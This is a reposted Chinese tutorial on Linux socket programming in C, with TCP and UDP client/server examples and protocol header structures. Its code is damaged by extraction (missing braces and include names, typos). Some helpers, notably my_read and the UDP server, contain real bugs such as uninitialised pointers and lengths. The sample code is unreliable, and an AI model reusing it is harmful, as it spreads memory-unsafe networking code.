Chinaunix首页 | 论坛 | 博客
  • 博客访问: 104640928
  • 博文数量: 19283
  • 博客积分: 9968
  • 博客等级: 上将
  • 技术积分: 196062
  • 用 户 组: 普通用户
  • 注册时间: 2007-02-07 14:28
文章分类

全部博文(19283)

文章存档

2011年(1)

2009年(125)

2008年(19094)

2007年(63)

分类: C/C++

2008-04-16 17:29:49

作者:007xiong   
 8)Linux程序设计入门--网络编程 

Linux系统的一个主要特点是他的网络功能非常强大。随着网络的日益普及,基于网络的 
应用也将越来越多。 在这个网络时代,掌握了Linux的网络编程技术,将令每一个人处 
于不败之地,学习Linux的网络编程,可以让我们真正的体会到网络的魅力。 想成为一 
位真正的hacker,必须掌握网络编程技术。 
现在书店里面已经有了许多关于Linux网络编程方面的书籍,网络上也有了许多关于 
网络编程方面的教材,大家都可以 去看一看的。在这里我会和大家一起来领会Linux网 
络编程的奥妙,由于我学习Linux的网络编程也开始不久,所以我下面所说的肯定会有错 
误的, 还请大家指点出来,在这里我先谢谢大家了。 
在这一个章节里面,我会和以前的几个章节不同,在前面我都是概括的说了一下, 
从现在开始我会尽可能的详细的说明每一个函数及其用法。好了让我们去领会Linux的伟 
大的魅力吧! 
开始进入网络编程 



网络编程(1) 

1. Linux网络知识介绍 
1.1 客户端程序和服务端程序 
网络程序和普通的程序有一个最大的区别是网络程序是由两个部分组成的--客户端和服 
务器端. 
网络程序是先有服务器程序启动,等待客户端的程序运行并建立连接.一般的来说是服务 
端的程序 在一个端口上监听,直到有一个客户端的程序发来了请求. 
1.2 常用的命令 
由于网络程序是有两个部分组成,所以在调试的时候比较麻烦,为此我们有必要知道一些 
常用的网络命令 
netstat 
命令netstat是用来显示网络的连接,路由表和接口统计等网络的信息.netstat有许多的 
选项 我们常用的选项是 -an 用来显示详细的网络状态.至于其它的选项我们可以使用帮 
助手册获得详细的情况. 
telnet 
telnet是一个用来远程控制的程序,但是我们完全可以用这个程序来调试我们的服务端程 
序的. 比如我们的服务器程序在监听8888端口,我们可以用telnet localhost 8888来查 
看服务端的状况. 
1.3 TCP/UDP介绍 
TCP(Transfer Control Protocol)传输控制协议是一种面向连接的协议,当我们的网络程 
序使用 这个协议的时候,网络可以保证我们的客户端和服务端的连接是可靠的,安全的. 

UDP(User Datagram Protocol)用户数据报协议是一种非面向连接的协议,这种协议并不 
能保证我们 的网络程序的连接是可靠的,所以我们现在编写的程序一般是采用TCP协议的 
.. 

网络编程(2) 

2. 初等网络函数介绍(TCP) 
Linux系统是通过提供套接字(socket)来进行网络编程的.网络程序通过socket和其它 
几个函数的调用,会返回一个 通讯的文件描述符,我们可以将这个描述符看成普通的文件 
的描述符来操作,这就是linux的设备无关性的 好处.我们可以通过向描述符读写操作实 
现网络之间的数据交流. 
2.1 socket 
int socket(int domain, int type,int protocol) 
domain:说明我们网络程序所在的主机采用的通讯协族(AF_UNIX和AF_INET等). AF_UN 
IX只能够用于单一的Unix系统进程间通信,而AF_INET是针对Internet的,因而可以允许在 
远程 主机之间通信(当我们 man socket时发现 domain可选项是 PF_*而不是AF_*,因为 
glibc是posix的实现 所以用PF代替了AF,不过我们都可以使用的). 
type:我们网络程序所采用的通讯协议(SOCK_STREAM,SOCK_DGRAM等) SOCK_STREAM表明 
我们用的是TCP协议,这样会提供按顺序的,可靠,双向,面向连接的比特流. SOCK_DGRAM 
表明我们用的是UDP协议,这样只会提供定长的,不可靠,无连接的通信. 
protocol:由于我们指定了type,所以这个地方我们一般只要用0来代替就可以了 sock 
et为网络通讯做基本的准备.成功时返回文件描述符,失败时返回-1,看errno可知道出错 
的详细情况. 
2.2 bind 
int bind(int sockfd, struct sockaddr *my_addr, int addrlen) 
sockfd:是由socket调用返回的文件描述符. 
addrlen:是sockaddr结构的长度. 
my_addr:是一个指向sockaddr的指针. 在中有 sockaddr的定义 
struct sockaddr{ 
unisgned short as_family; 
char sa_data[14]; 
}; 
不过由于系统的兼容性,我们一般不用这个头文件,而使用另外一个结构(struct sock 
addr_in) 来代替.在中有sockaddr_in的定义 
struct sockaddr_in{ 
unsigned short sin_family; 
unsigned short int sin_port; 
struct in_addr sin_addr; 
unsigned char sin_zero[8]; 
我们主要使用Internet所以sin_family一般为AF_INET,sin_addr设置为INADDR_ANY表 
示可以 和任何的主机通信,sin_port是我们要监听的端口号.sin_zero[8]是用来填充的 
.. bind将本地的端口同socket返回的文件描述符捆绑在一起.成功是返回0,失败的情况和 
socket一样 
2.3 listen 
int listen(int sockfd,int backlog) 
sockfd:是bind后的文件描述符. 
backlog:设置请求排队的最大长度.当有多个客户端程序和服务端相连时, 使用这个表示 
可以介绍的排队长度. listen函数将bind的文件描述符变为监听套接字.返回的情况和b 
ind一样. 
2.4 accept 
int accept(int sockfd, struct sockaddr *addr,int *addrlen) 
sockfd:是listen后的文件描述符. 
addr,addrlen是用来给客户端的程序填写的,服务器端只要传递指针就可以了. bind,li 
sten和accept是服务器端用的函数,accept调用时,服务器端的程序会一直阻塞到有一个 
客户程序发出了连接. accept成功时返回最后的服务器端的文件描述符,这个时候服务 
器端可以向该描述符写信息了. 失败时返回-1 
2.5 connect 
int connect(int sockfd, struct sockaddr * serv_addr,int addrlen) 
sockfd:socket返回的文件描述符. 
serv_addr:储存了服务器端的连接信息.其中sin_add是服务端的地址 
addrlen:serv_addr的长度 
connect函数是客户端用来同服务端连接的.成功时返回0,sockfd是同服务端通讯的文件 
描述符 失败时返回-1. 
2.6 实例 
服务器端程序 
/******* 服务器程序 (server.c) ************/ 
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
int main(int argc, char *argv[]) 

int sockfd,new_fd; 
struct sockaddr_in server_addr; 
struct sockaddr_in client_addr; 
int sin_size,portnumber; 
char hello[]="Hello! Are You Fine?\n"
if(argc!=2) 

fprintf(stderr,"Usage:%s portnumber\a\n",argv[0]); 
exit(1); 

if((portnumber=atoi(argv[1]))<0) 

fprintf(stderr,"Usage:%s portnumber\a\n",argv[0]); 
exit(1); 

/* 服务器端开始建立socket描述符 */ 
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) 

fprintf(stderr,"Socket error:%s\n\a",strerror(errno)); 
exit(1); 

/* 服务器端填充 sockaddr结构 */ 
bzero(&server_addr,sizeof(struct sockaddr_in)); 
server_addr.sin_family=AF_INET; 
server_addr.sin_addr.s_addr=htonl(INADDR_ANY); 
server_addr.sin_port=htons(portnumber); 
/* 捆绑sockfd描述符 */ 
if(bind(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr))== 
-1) 

fprintf(stderr,"Bind error:%s\n\a",strerror(errno)); 
exit(1); 

/* 监听sockfd描述符 */ 
if(listen(sockfd,5)==-1) 

fprintf(stderr,"Listen error:%s\n\a",strerror(errno)); 
exit(1); 

while(1) 

/* 服务器阻塞,直到客户程序建立连接 */ 
sin_size=sizeof(struct sockaddr_in); 
if((new_fd=accept(sockfd,(struct sockaddr *)(&client_addr),&sin_size 
))==-1) 

fprintf(stderr,"Accept error:%s\n\a",strerror(errno)); 
exit(1); 

fprintf(stderr,"Server get connection from %s\n"
inet_ntoa(client_addr.sin_addr)); 
if(write(new_fd,hello,strlen(hello))==-1) 

fprintf(stderr,"Write Error:%s\n",strerror(errno)); 
exit(1); 

/* 这个通讯已经结束 */ 
close(new_fd); 
/* 循环下一个 */ 

close(sockfd); 
exit(0); 

客户端程序 
/******* 客户端程序 client.c ************/ 
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
int main(int argc, char *argv[]) 

int sockfd; 
char buffer[1024]; 
struct sockaddr_in server_addr; 
struct hostent *host; 
int portnumber,nbytes; 
if(argc!=3) 

fprintf(stderr,"Usage:%s hostname portnumber\a\n",argv[0]); 
exit(1); 

if((host=gethostbyname(argv[1]))==NULL) 

fprintf(stderr,"Gethostname error\n"); 
exit(1); 

if((portnumber=atoi(argv[2]))<0) 

fprintf(stderr,"Usage:%s hostname portnumber\a\n",argv[0]); 
exit(1); 

/* 客户程序开始建立 sockfd描述符 */ 
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) 

fprintf(stderr,"Socket Error:%s\a\n",strerror(errno)); 
exit(1); 

/* 客户程序填充服务端的资料 */ 
bzero(&server_addr,sizeof(server_addr)); 
server_addr.sin_family=AF_INET; 
server_addr.sin_port=htons(portnumber); 
server_addr.sin_addr=*((struct in_addr *)host->h_addr); 
/* 客户程序发起连接请求 */ 
if(connect(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr) 
)==-1) 

fprintf(stderr,"Connect Error:%s\a\n",strerror(errno)); 
exit(1); 

/* 连接成功了 */ 
if((nbytes=read(sockfd,buffer,1024))==-1) 

fprintf(stderr,"Read Error:%s\n",strerror(errno)); 
exit(1); 

buffer[nbytes]='\0'
printf("I have received:%s\n",buffer); 
/* 结束通讯 */ 
close(sockfd); 
exit(0); 

MakeFile 
这里我们使用GNU 的make实用程序来编译. 关于make的详细说明见 Make 使用介绍 
######### Makefile ########### 
all:server client 
server:server.c 
gcc $^ -o $@ 
client:client.c 
gcc $^ -o $@ 
运行make后会产生两个程序server(服务器端)和client(客户端) 先运行./server port 
number& (portnumber随便取一个大于1204且不在/etc/services中出现的号码 就用888 
8好了),然后运行 ./client localhost 8888 看看有什么结果. (你也可以用telnet和n 
etstat试一试.) 上面是一个最简单的网络程序,不过是不是也有点烦.上面有许多函数我 
们还没有解释. 我会在下一章进行的详细的说明. 
2.7 总结 
总的来说网络程序是由两个部分组成的--客户端和服务器端.它们的建立步骤一般是: 
服务器端 
socket-->bind-->listen-->accept 
客户端 
socket-->connect 
-- 

网络编程(3) 

3. 服务器和客户机的信息函数 
这一章我们来学习转换和网络方面的信息函数. 
3.1 字节转换函数 
在网络上面有着许多类型的机器,这些机器在表示数据的字节顺序是不同的, 比如i386芯 
片是低字节在内存地址的低端,高字节在高端,而alpha芯片却相反. 为了统一起来,在Li 
nux下面,有专门的字节转换函数. 
unsigned long int htonl(unsigned long int hostlong) 
unsigned short int htons(unisgned short int hostshort) 
unsigned long int ntohl(unsigned long int netlong) 
unsigned short int ntohs(unsigned short int netshort) 
在这四个转换函数中,h 代表host, n 代表 network.s 代表short l 代表long 第一个函 
数的意义是将本机器上的long数据转化为网络上的long. 其他几个函数的意义也差不多 
.. 
3.2 IP和域名的转换 
在网络上标志一台机器可以用IP或者是用域名.那么我们怎么去进行转换呢? 
struct hostent *gethostbyname(const char *hostname) 
struct hostent *gethostbyaddr(const char *addr,int len,int type) 
中有struct hostent的定义 
struct hostent{ 
char *h_name; /* 主机的正式名称 */ 
char *h_aliases; /* 主机的别名 */ 
int h_addrtype; /* 主机的地址类型 AF_INET*/ 
int h_length; /* 主机的地址长度 对于IP4 是4字节32位*/ 
char **h_addr_list; /* 主机的IP地址列表 */ 

#define h_addr h_addr_list[0] /* 主机的第一个IP地址*/ 
gethostbyname可以将机器名(如 linux.yessun.com)转换为一个结构指针.在这个结构里 
面储存了域名的信息 
gethostbyaddr可以将一个32位的IP地址(C0A80001)转换为结构指针. 
这两个函数失败时返回NULL 且设置h_errno错误变量,调用h_strerror()可以得到详细的 
出错信息 
3.3 字符串的IP和32位的IP转换. 
在网络上面我们用的IP都是数字加点(192.168.0.1)构成的, 而在struct in_addr结构中 
用的是32位的IP, 我们上面那个32位IP(C0A80001)是的192.168.0.1 为了转换我们可以 
使用下面两个函数 
int inet_aton(const char *cp,struct in_addr *inp) 
char *inet_ntoa(struct in_addr in) 
函数里面 a 代表 ascii n 代表network.第一个函数表示将a.b.c.d的IP转换为32位的I 
P,存储在 inp指针里面.第二个是将32位IP转换为a.b.c.d的格式. 
3.4 服务信息函数 
在网络程序里面我们有时候需要知道端口.IP和服务信息.这个时候我们可以使用以下几 
个函数 
int getsockname(int sockfd,struct sockaddr *localaddr,int *addrlen) 
int getpeername(int sockfd,struct sockaddr *peeraddr, int *addrlen) 
struct servent *getservbyname(const char *servname,const char *protoname) 
struct servent *getservbyport(int port,const char *protoname) 
struct servent 

char *s_name; /* 正式服务名 */ 
char **s_aliases; /* 别名列表 */ 
int s_port; /* 端口号 */ 
char *s_proto; /* 使用的协议 */ 

一般我们很少用这几个函数.对应客户端,当我们要得到连接的端口号时在connect调用成 
功后使用可得到 系统分配的端口号.对于服务端,我们用INADDR_ANY填充后,为了得到连 
接的IP我们可以在accept调用成功后 使用而得到IP地址. 
在网络上有许多的默认端口和服务,比如端口21对ftp80对应WWW.为了得到指定的端口号 
的服务 我们可以调用第四个函数,相反为了得到端口号可以调用第三个函数. 
3.5 一个例子 
#include  
#include  
#include  
#include  
#include  
int main(int argc ,char **argv) 

struct sockaddr_in addr; 
struct hostent *host; 
char **alias; 
if(argc<2) 

fprintf(stderr,"Usage:%s hostname|ip..\n\a",argv[0]); 
exit(1); 

argv++; 
for(;*argv!=NULL;argv++) 

/* 这里我们假设是IP*/ 
if(inet_aton(*argv,&addr.sin_addr)!=0) 

host=gethostbyaddr((char *)&addr.sin_addr,4,AF_INET); 
printf("Address information of Ip %s\n",*argv); 

else 

/* 失败,难道是域名?*/ 
host=gethostbyname(*argv); printf("Address information 

of host %s\n",*argv); 

if(host==NULL) 

/* 都不是 ,算了不找了*/ 
fprintf(stderr,"No address information of %s\n",*arg 
v); 
continue; 

printf("Official host name %s\n",host->h_name); 
printf("Name aliases:"); 
for(alias=host->h_aliases;*alias!=NULL;alias++) 
printf("%s ,",*alias); 
printf("\nIp address:"); 
for(alias=host->h_addr_list;*alias!=NULL;alias++) 
printf("%s ,",inet_ntoa(*(struct in_addr *)(*alias))); 


在这个例子里面,为了判断用户输入的是IP还是域名我们调用了两个函数,第一次我们假 
设输入的是IP所以调用inet_aton, 失败的时候,再调用gethostbyname而得到信息. 
-- 

网络编程(4) 

4. 完整的读写函数 
一旦我们建立了连接,我们的下一步就是进行通信了.在Linux下面把我们前面建立的通道 
看成是文件描述符,这样服务器端和客户端进行通信时候,只要往文件描述符里面读写东 
西了. 就象我们往文件读写一样. 
4.1 写函数write 
ssize_t write(int fd,const void *buf,size_t nbytes) 
write函数将buf中的nbytes字节内容写入文件描述符fd.成功时返回写的字节数.失败时 
返回-1. 并设置errno变量. 在网络程序中,当我们向套接字文件描述符写时有俩种可能 
.. 
1)write的返回值大于0,表示写了部分或者是全部的数据. 
2)返回的值小于0,此时出现了错误.我们要根据错误类型来处理. 
如果错误为EINTR表示在写的时候出现了中断错误. 
如果为EPIPE表示网络连接出现了问题(对方已经关闭了连接). 
为了处理以上的情况,我们自己编写一个写函数来处理这几种情况. 
int my_write(int fd,void *buffer,int length) 

int bytes_left; 
int written_bytes; 
char *ptr; 
ptr=buffer; 
bytes_left=length; 
while(bytes_left>0) 

/* 开始写*/ 
written_bytes=write(fd,ptr,bytes_left); 
if(written_bytes<=0) /* 出错了*/ 

if(errno==EINTR) /* 中断错误 我们继续写*/ 
written_bytes=0; 
else /* 其他错误 没有办法,只好撤退了*/ 
return(-1); 

bytes_left-=written_bytes; 
ptr+=written_bytes; /* 从剩下的地方继续写 */ 

return(0); 

4.2 读函数read 
ssize_t read(int fd,void *buf,size_t nbyte) read函数是负责从fd中读取内容.当读 
成功时,read返回实际所读的字节数,如果返回的值是0 表示已经读到文件的结束了,小于 
0表示出现了错误.如果错误为EINTR说明读是由中断引起的, 如果是ECONNREST表示网络 
连接出了问题. 和上面一样,我们也写一个自己的读函数. 
int my_read(int fd,void *buffer,int length) 

int bytes_left; 
int bytes_read; 
char *ptr; 
bytes_left=length; 
while(bytes_left>0) 

bytes_read=read(fd,ptr,bytes_read); 
if(bytes_read<0) 

if(errno==EINTR) 
bytes_read=0; 
else 
return(-1); 

else if(bytes_read==0) 
break; 
bytes_left-=bytes_read; 
ptr+=bytes_read; 

return(length-bytes_left); 

4.3 数据的传递 
有了上面的两个函数,我们就可以向客户端或者是服务端传递数据了.比如我们要传递一 
个结构.可以使用如下方式 
/* 客户端向服务端写 */ 
struct my_struct my_struct_client; 
write(fd,(void *)&my_struct_client,sizeof(struct my_struct); 
/* 服务端的读*/ 
char buffer[sizeof(struct my_struct)]; 
struct *my_struct_server; 
read(fd,(void *)buffer,sizeof(struct my_struct)); 
my_struct_server=(struct my_struct *)buffer; 
在网络上传递数据时我们一般都是把数据转化为char类型的数据传递.接收的时候也是一 
样的 注意的是我们没有必要在网络上传递指针(因为传递指针是没有任何意义的,我们必 
须传递指针所指向的内容) 
-- 

网络编程(5) 

5. 用户数据报发送 
我们前面已经学习网络程序的一个很大的部分,由这个部分的知识,我们实际上可以写出 
大部分的基于TCP协议的网络程序了.现在在Linux下的大部分程序都是用我们上面所学的 
知识来写的.我们可以去找一些源程序来参考一下.这一章,我们简单的学习一下基于UDP 
协议的网络程序. 
5.1 两个常用的函数 
int recvfrom(int sockfd,void *buf,int len,unsigned int flags,struct socka 
ddr * from int *fromlen) 
int sendto(int sockfd,const void *msg,int len,unsigned int flags,struct s 
ockaddr *to int tolen) 
sockfd,buf,len的意义和read,write一样,分别表示套接字描述符,发送或接收的缓冲区 
及大小.recvfrom负责从sockfd接收数据,如果from不是NULL,那么在from里面存储了信息 
来源的情况,如果对信息的来源不感兴趣,可以将from和fromlen设置为NULL.sendto负责 
向to发送信息.此时在to里面存储了收信息方的详细资料. 
5.2 一个实例 
/* 服务端程序 server.c */ 
#include  
#include  
#include  
#include  
#include  
#define SERVER_PORT 8888 
#define MAX_MSG_SIZE 1024 
void udps_respon(int sockfd) 

struct sockaddr_in addr; 
int addrlen,n; 
char msg[MAX_MSG_SIZE]; 
while(1) 
{ /* 从网络上度,写到网络上面去 */ 
n=recvfrom(sockfd,msg,MAX_MSG_SIZE,0, 
(struct sockaddr*)&addr,&addrlen); 
msg[n]=0; 
/* 显示服务端已经收到了信息 */ 
fprintf(stdout,"I have received %s",msg); 
sendto(sockfd,msg,n,0,(struct sockaddr*)&addr,addrlen); 


int main(void) 

int sockfd; 
struct sockaddr_in addr; 
sockfd=socket(AF_INET,SOCK_DGRAM,0); 
if(sockfd<0) 

fprintf(stderr,"Socket Error:%s\n",strerror(errno)); 
exit(1); 

bzero(&addr,sizeof(struct sockaddr_in)); 
addr.sin_family=AF_INET; 
addr.sin_addr.s_addr=htonl(INADDR_ANY); 
addr.sin_port=htons(SERVER_PORT); 
if(bind(sockfd,(struct sockaddr *)&ddr,sizeof(struct sockaddr_in))<0 


fprintf(stderr,"Bind Error:%s\n",strerror(errno)); 
exit(1); 

udps_respon(sockfd); 
close(sockfd); 

/* 客户端程序 */ 
#include  
#include  
#include  
#include  
#include  
#include  
#define MAX_BUF_SIZE 1024 
void udpc_requ(int sockfd,const struct sockaddr_in *addr,int len) 

char buffer[MAX_BUF_SIZE]; 
int n; 
while(1) 
{ /* 从键盘读入,写到服务端 */ 
fgets(buffer,MAX_BUF_SIZE,stdin); 
sendto(sockfd,buffer,strlen(buffer),0,addr,len); 
bzero(buffer,MAX_BUF_SIZE); 
/* 从网络上读,写到屏幕上 */ 
n=recvfrom(sockfd,buffer,MAX_BUF_SIZE,0,NULL,NULL); 
buffer[n]=0; 
fputs(buffer,stdout); 


int main(int argc,char **argv) 

int sockfd,port; 
struct sockaddr_in addr; 
if(argc!=3) 

fprintf(stderr,"Usage:%s server_ip server_port\n",argv[0]); 
exit(1); 

if((port=atoi(argv[2]))<0) 

fprintf(stderr,"Usage:%s server_ip server_port\n",argv[0]); 
exit(1); 

sockfd=socket(AF_INET,SOCK_DGRAM,0); 
if(sockfd<0) 

fprintf(stderr,"Socket Error:%s\n",strerror(errno)); 
exit(1); 

/* 填充服务端的资料 */ 
bzero(&addr,sizeof(struct sockaddr_in)); 
addr.sin_family=AF_INET; 
addr.sin_port=htons(port); 
if(inet_aton(argv[1],&addr.sin_addr)<0) 

fprintf(stderr,"Ip error:%s\n",strerror(errno)); 
exit(1); 

udpc_requ(sockfd,&addr,sizeof(struct sockaddr_in)); 
close(sockfd); 

########### 编译文件 Makefile ########## 
all:server client 
server:server.c 
gcc -o server server.c 
client:client.c 
gcc -o client client.c 
clean: 
rm -f server 
rm -f client 
rm -f core 
上面的实例如果大家编译运行的话,会发现一个小问题的. 在我机器上面,我先运行服务 
端,然后运行客户端.在客户端输入信息,发送到服务端, 在服务端显示已经收到信息,但 
是客户端没有反映.再运行一个客户端,向服务端发出信息 却可以得到反应.我想可能是 
第一个客户端已经阻塞了.如果谁知道怎么解决的话,请告诉我,谢谢. 由于UDP协议是不 
保证可靠接收数据的要求,所以我们在发送信息的时候,系统并不能够保证我们发出的信 
息都正确无误的到达目的地.一般的来说我们在编写网络程序的时候都是选用TCP协议的 
-- 

网络编程(6) 

6. 高级套接字函数 
在前面的几个部分里面,我们已经学会了怎么样从网络上读写信息了.前面的一些函数(r 
ead,write)是网络程序里面最基本的函数.也是最原始的通信函数.在这一章里面,我们一 
起来学习网络通信的高级函数.这一章我们学习另外几个读写函数. 
6.1 recv和send 
recv和send函数提供了和read和write差不多的功能.不过它们提供 了第四个参数来控制 
读写操作. 
int recv(int sockfd,void *buf,int len,int flags) 
int send(int sockfd,void *buf,int len,int flags) 
前面的三个参数和read,write一样,第四个参数可以是0或者是以下的组合 
_______________________________________________________________ 
| MSG_DONTROUTE | 不查找路由表 | 
| MSG_OOB | 接受或者发送带外数据 | 
| MSG_PEEK | 查看数据,并不从系统缓冲区移走数据 | 
| MSG_WAITALL | 等待所有数据 | 
|--------------------------------------------------------------| 
MSG_DONTROUTE:是send函数使用的标志.这个标志告诉IP协议.目的主机在本地网络上面 
,没有必要查找路由表.这个标志一般用网络诊断和路由程序里面. 
MSG_OOB:表示可以接收和发送带外的数据.关于带外数据我们以后会解释的. 
MSG_PEEK:是recv函数的使用标志,表示只是从系统缓冲区中读取内容,而不清楚系统缓冲 
区的内容.这样下次读的时候,仍然是一样的内容.一般在有多个进程读写数据时可以使用 
这个标志. 
MSG_WAITALL是recv函数的使用标志,表示等到所有的信息到达时才返回.使用这个标志的 
时候recv回一直阻塞,直到指定的条件满足,或者是发生了错误. 1)当读到了指定的字节 
时,函数正常返回.返回值等于len 2)当读到了文件的结尾时,函数正常返回.返回值小于 
len 3)当操作发生错误时,返回-1,且设置错误为相应的错误号(errno) 
如果flags为0,则和read,write一样的操作.还有其它的几个选项,不过我们实际上用的很 
少,可以查看 Linux Programmer's Manual得到详细解释. 
6.2 recvfrom和sendto 
这两个函数一般用在非套接字的网络程序当中(UDP),我们已经在前面学会了. 
6.3 recvmsg和sendmsg 
recvmsg和sendmsg可以实现前面所有的读写函数的功能. 
int recvmsg(int sockfd,struct msghdr *msg,int flags) 
int sendmsg(int sockfd,struct msghdr *msg,int flags) 
struct msghdr 

void *msg_name; 
int msg_namelen; 
struct iovec *msg_iov; 
int msg_iovlen; 
void *msg_control; 
int msg_controllen; 
int msg_flags; 

struct iovec 

void *iov_base; /* 缓冲区开始的地址 */ 
size_t iov_len; /* 缓冲区的长度 */ 

msg_name和 msg_namelen当套接字是非面向连接时(UDP),它们存储接收和发送方的地址 
信息.msg_name实际上是一个指向struct sockaddr的指针,msg_name是结构的长度.当套 
接字是面向连接时,这两个值应设为NULL. msg_iov和msg_iovlen指出接受和发送的缓冲 
区内容.msg_iov是一个结构指针,msg_iovlen指出这个结构数组的大小. msg_control和 
msg_controllen这两个变量是用来接收和发送控制数据时的 msg_flags指定接受和发送 
的操作选项.和recv,send的选项一样 
6.4 套接字的关闭 
关闭套接字有两个函数close和shutdown.用close时和我们关闭文件一样. 
6.5 shutdown 
int shutdown(int sockfd,int howto) 
TCP连接是双向的(是可读写的),当我们使用close时,会把读写通道都关闭,有时侯我们希 
望只关闭一个方向,这个时候我们可以使用shutdown.针对不同的howto,系统回采取不同 
的关闭方式. 
howto=0这个时候系统会关闭读通道.但是可以继续往接字描述符写. 
howto=1关闭写通道,和上面相反,着时候就只可以读了. 
howto=2关闭读写通道,和close一样 在多进程程序里面,如果有几个子进程共享一个套接 
字时,如果我们使用shutdown, 那么所有的子进程都不能够操作了,这个时候我们只能够 
使用close来关闭子进程的套接字描述符. 



网络编程(7) 

7. TCP/IP协议 
你也许听说过TCP/IP协议,那么你知道到底什么是TCP,什么是IP吗?在这一章里面,我们一 
起来学习这个目前网络上用最广泛的协议. 
7.1 网络传输分层 
如果你考过计算机等级考试,那么你就应该已经知道了网络传输分层这个概念.在网络上 
,人们为了传输数据时的方便,把网络的传输分为7个层次.分别是:应用层,表示层,会话层 
,传输层,网络层,数据链路层和物理层.分好了层以后,传输数据时,上一层如果要数据的 
话,就可以直接向下一层要了,而不必要管数据传输的细节.下一层也只向它的上一层提供 
数据,而不要去管其它东西了.如果你不想考试,你没有必要去记这些东西的.只要知道是 
分层的,而且各层的作用不同. 
7.2 IP协议 
IP协议是在网络层的协议.它主要完成数据包的发送作用. 下面这个表是IP4的数据包格 
式 
0 4 8 16 32 
-------------------------------------------------- 
|版本 |首部长度|服务类型| 数据包总长 | 
-------------------------------------------------- 
| 标识 |DF |MF| 碎片偏移 | 
-------------------------------------------------- 
| 生存时间 | 协议 | 首部较验和 | 
------------------------------------------------ 
| 源IP地址 | 
------------------------------------------------ 
| 目的IP地址 | 
------------------------------------------------- 
| 选项 | 
================================================= 
| 数据 | 
------------------------------------------------- 
下面我们看一看IP的结构定义 
struct ip 

#if __BYTE_ORDER == __LITTLE_ENDIAN 
unsigned int ip_hl:4; /* header length */ 
unsigned int ip_v:4; /* version */ 
#endif 
#if __BYTE_ORDER == __BIG_ENDIAN 
unsigned int ip_v:4; /* version */ 
unsigned int ip_hl:4; /* header length */ 
#endif 
u_int8_t ip_tos; /* type of service */ 
u_short ip_len; /* total length */ 
u_short ip_id; /* identification */ 
u_short ip_off; /* fragment offset field */ 
#define IP_RF 0x8000 /* reserved fragment flag */ 
#define IP_DF 0x4000 /* dont fragment flag */ 
#define IP_MF 0x2000 /* more fragments flag */ 
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */ 
u_int8_t ip_ttl; /* time to live */ 
u_int8_t ip_p; /* protocol */ 
u_short ip_sum; /* checksum */ 
struct in_addr ip_src, ip_dst; /* source and dest address */ 
}; 
ip_vIP协议的版本号,这里是4,现在IPV6已经出来了 
ip_hlIP包首部长度,这个值以4字节为单位.IP协议首部的固定长度为20个字节,如果IP包 
没有选项,那么这个值为5. 
ip_tos服务类型,说明提供的优先权. 
ip_len说明IP数据的长度.以字节为单位. 
ip_id标识这个IP数据包. 
ip_off碎片偏移,这和上面ID一起用来重组碎片的. 
ip_ttl生存时间.没经过一个路由的时候减一,直到为0时被抛弃. 
ip_p协议,表示创建这个IP数据包的高层协议.如TCP,UDP协议. 
ip_sum首部校验和,提供对首部数据的校验. 
ip_src,ip_dst发送者和接收者的IP地址 
关于IP协议的详细情况,请参考 RFC791 
7.3 ICMP协议 
ICMP是消息控制协议,也处于网络层.在网络上传递IP数据包时,如果发生了错误,那么就 
会用ICMP协议来报告错误. 
ICMP包的结构如下: 
0 8 16 32 
--------------------------------------------------------------------- 
| 类型 | 代码 | 校验和 | 
-------------------------------------------------------------------- 
| 数据 | 数据 | 
-------------------------------------------------------------------- 
ICMP在中的定义是 
struct icmphdr 

u_int8_t type; /* message type */ 
u_int8_t code; /* type sub-code */ 
u_int16_t checksum; 
union 

struct 

u_int16_t id; 
u_int16_t sequence; 
} echo; /* echo datagram */ 
u_int32_t gateway; /* gateway address */ 
struct 

u_int16_t __unused; 
u_int16_t mtu; 
} frag; /* path mtu discovery */ 
} un; 
}; 
关于ICMP协议的详细情况可以查看 RFC792 
7.4 UDP协议 
UDP协议是建立在IP协议基础之上的,用在传输层的协议.UDP和IP协议一样是不可靠的数 
据报服务.UDP的头格式为: 
0 16 32 
--------------------------------------------------- 
| UDP源端口 | UDP目的端口 | 
--------------------------------------------------- 
| UDP数据报长度 | UDP数据报校验 | 
--------------------------------------------------- 
UDP结构在中的定义为: 
struct udphdr { 
u_int16_t source; 
u_int16_t dest; 
u_int16_t len; 
u_int16_t check; 
}; 
关于UDP协议的详细情况,请参考 RFC768 
7.5 TCP 
TCP协议也是建立在IP协议之上的,不过TCP协议是可靠的.按照顺序发送的.TCP的数据结 
构比前面的结构都要复杂. 
0 4 8 10 16 24 32 
------------------------------------------------------------------- 
| 源端口 | 目的端口 | 
------------------------------------------------------------------- 
| 序列号 | 
------------------------------------------------------------------ 
| 确认号 | 
------------------------------------------------------------------ 
| | |U|A|P|S|F| | 
|首部长度| 保留 |R|C|S|Y|I| 窗口 | 
| | |G|K|H|N|N| | 
----------------------------------------------------------------- 
| 校验和 | 紧急指针 | 
----------------------------------------------------------------- 
| 选项 | 填充字节 | 
----------------------------------------------------------------- 
TCP的结构在中定义为: 
struct tcphdr 

u_int16_t source; 
u_int16_t dest; 
u_int32_t seq; 
u_int32_t ack_seq; 
#if __BYTE_ORDER == __LITTLE_ENDIAN 
u_int16_t res1:4; 
u_int16_t doff:4; 
u_int16_t fin:1; 
u_int16_t syn:1; 
u_int16_t rst:1; 
u_int16_t psh:1; 
u_int16_t ack:1; 
u_int16_t urg:1; 
u_int16_t res2:2; 
#elif __BYTE_ORDER == __BIG_ENDIAN 
u_int16_t doff:4; 
u_int16_t res1:4; 
u_int16_t res2:2; 
u_int16_t urg:1; 
u_int16_t ack:1; 
u_int16_t psh:1; 
u_int16_t rst:1; 
u_int16_t syn:1; 
u_int16_t fin:1; 
#endif 
u_int16_t window; 
u_int16_t check; 
u_int16_t urg_prt; 
}; 
source发送TCP数据的源端口 
dest接受TCP数据的目的端口 
seq标识该TCP所包含的数据字节的开始序列号 
ack_seq确认序列号,表示接受方下一次接受的数据序列号. 
doff数据首部长度.和IP协议一样,以4字节为单位.一般的时候为5 
urg如果设置紧急数据指针,则该位为1 
ack如果确认号正确,那么为1 
psh如果设置为1,那么接收方收到数据后,立即交给上一层程序 
